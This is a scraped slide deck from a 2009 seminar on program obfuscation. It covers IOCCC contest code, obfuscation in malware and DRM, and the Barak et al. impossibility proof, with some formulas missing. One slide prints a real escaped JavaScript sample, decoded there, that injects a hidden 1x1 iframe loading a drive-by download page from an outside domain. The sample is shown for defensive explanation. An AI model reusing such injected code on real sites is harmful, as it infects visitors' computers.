660 likes | 811 Views
Seminar in Cryptographic Protocols: Program Obfuscation. Omer Singer June 8, 2009. Practical Background. What is program obfuscation?. Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do.
E N D
Seminar in Cryptographic Protocols: Program Obfuscation Omer Singer June 8, 2009
What is program obfuscation? • Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do. • “The art of making things appear more complicated”
What does this function do? Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html
Three main values: • Potency • Resilience • Cost • Many methods in use: • Modify variable names and layout • Replace integer values with complex equations • Change program flow • Modify data structures • Anti-disassembly (“armored” viruses) • Anti-debugging
Winner of the international C obfuscation contest in 1996 Shows the time on a clock with a configurable face and style
Winner of the international C obfuscation contest in 2001 #include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(structsockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_setI;structsocka\ ddr_inil;struct host\ ent*LI; structtimevalIL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);} Network-based Pong game
Actual web code blocked by an Intrusion Prevention System at a client: <Script Language='Javascript'> <!-- document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C%45%3E%3C%2F%54%49%54%4C%45%3E%0A%3C%2F%48%45%41%44%3E%0A%3C%42%4F%44%59%20%6C%65%66%74%6D%61%72%67%69%6E%3D%30%20%74%6F%70%6D%61%72%67%69%6E%3D%30%20%72%69%67%68%74%6D%61%72%67%69%6E%3D%30%20%62%6F%74%74%6F%6D%6D%61%72%67%69%6E%3D%30%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%30%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%30%3E%0A%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%66%73%6F%69%70%61%61%77%61%2E%63%6F%6D%2F%65%77%69%6F%71%61%2F%22%3E%3C%49%4D%47%20%73%72%63%3D%22%62%61%6E%6E%65%72%32%2E%67%69%66%22%20%77%69%64%74%68%3D%22%33%30%32%22%20%68%65%69%67%68%74%3D%22%32%35%32%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%61%3E%0A%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%78%63%7A%78%6F%2E%69%6E%66%6F%2F%6D%70%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%6E%6F%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%0A%0A%3C%2F%42%4F%44%59%3E%0A%3C%2F%48%54%4D%4C%3E')); //--> </Script>
When unobfuscated… <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0> <a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a> <iframesrc="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe> </BODY> </HTML>
Obfuscation helps to bypass antivirus, delay security research response • Obfuscated web code is often the first step in a “drive-by download” attack • When the web code is executed by the browser it calls programs to target local software • Result is infection of the user’s computer
Google Search Results Containing a Harmful URL Source: http://viruslist.com/en/analysis?pubid=204792056
Attempt to calculate impact of obfuscated online attacks: • $13.2 billion direct damages of malware1 • 74% of malware spread via compromised websites2 • 80% of browser-based attacks are now obfuscated3 • = $7.8 billion 1 http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf 2 http://viruslist.com/en/analysis?pubid=204792056 3 http://www.securityfocus.com/brief/846
Knowing is half the battle… A few tips to stop obfuscated “drive-by download” attacks • Use NoScript to block active content on Firefox • Don’t click on web ads • Keep client-side software updated: Adobe Reader, Flash Player, Apple Quicktime, etc.
Preventing source code theft • Disrupt reverse engineering • Block code copying • Especially important with the increased use of Java and .NET languages such as C# and Visual Basic which do not compile to machine code • Microsoft recommends obfuscating ASP files in case of server compromise • Watermarking and Digital Rights Management (DRM)
“If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.” - Chris Wysopal Good Obfuscation, Bad Code
Oracle Access • Used by [B+] to facilitate adversary model • The oracle is some function • Adversary makes query q to the oracle, receives answer f(q) • Useful when studying obfuscation: oracle serves as an interface to the program without exposing contents
Adversary with Oracle Access q q f(q) f(q) Program Adversary Oracle
Virtual Black Box Anything one can efficiently compute from a virtual black box, one should be able to efficiently compute given just oracle access to the program. In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.
Speaks Spanish • Answers in the form of a question q Tell me about yourself f(q) ¿Quequieres saber?
Adversary with access to the virtual black box Simulator with oracle access to the function
Circuit In the [B+] paper on obfuscation, a circuit represents a finite length Turing machine.
Circuits are easier to put in a virtual black box. • Therefore obfuscating circuits is easier than obfuscating TMs. • Proofs in the [B+] paper first prove theorems for TM then can easily extend to circuits.
Obfuscators • An obfuscator is an algorithm О that will restrict what an adversary can learn about P given O(P).
What is the adversary trying to achieve? • A program that produces the same output as P • A program that produces output with some relation to the output of P • A function that computes some function of P • Decide some property of P • The last achievement is the weakest, we want to prove that it is impossible.
TM Obfuscator A probabilistic algorithm O is a TM obfuscator if the following conditions hold…
Functionality: For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.
Polynomial slowdown: The description length and running time of O(M) are at most polynomially larger than those of M
“Virtual black box” property: For any PPT A, there is a PPT S and a negligible function α such that for all TMs M
Circuit Obfuscator • Same idea as TM Obfuscator but intuitively easier since a circuit computes a function with inputs of particular length • Hence the proposition: If a TM obfuscator exists, then a circuit obfuscator exists • Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows
Unobfuscatable Circuit Ensemble • A family of circuits such that: • Every circuit c in the family is efficient • There exists a predicate π(c) such that • π(c) is hard to compute with oracle access to the function that c computes • π(c) is easy to compute with access to any circuit c’ that computes the same function as c
Main Proof Structure [B+] structure their Proof the Main Impossibility Result as follows: • Define obfuscators that are secure when applied to two programs • Show that such obfuscators do not exist • Modify the construction to prove that TM/circuit obfuscators do not exist • Show how this proof yields an unobfuscatable function ensemble
2-TM Obfuscator A 2-TM obfuscator is defined the same as a TM obfuscator but with a strengthened “virtual black box property”: the adversary has access to two obfuscated Turing machines.
Formal definition of the strengthened “virtual black box” property: Simulator with oracle access to the two TMs Adversary with access to two obfuscated TMs
Proposition: According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.
Proof by contradiction… • Suppose that there exists a 2-TM obfuscator O. • Consider a function that cannot be learned by oracle queries, for example the following Turing machine:
Define another Turing machine such that: • Consider an adversary A such that: • A (C,D) = D(C)
Therefore S with oracle access to and must output 1 and with oracle access to and must output 0… but S cannot differentiate between the two so we have a contradiction.
Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that: The combination of the these equations contradict the fact that O is a 2-TM obfuscator:
In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.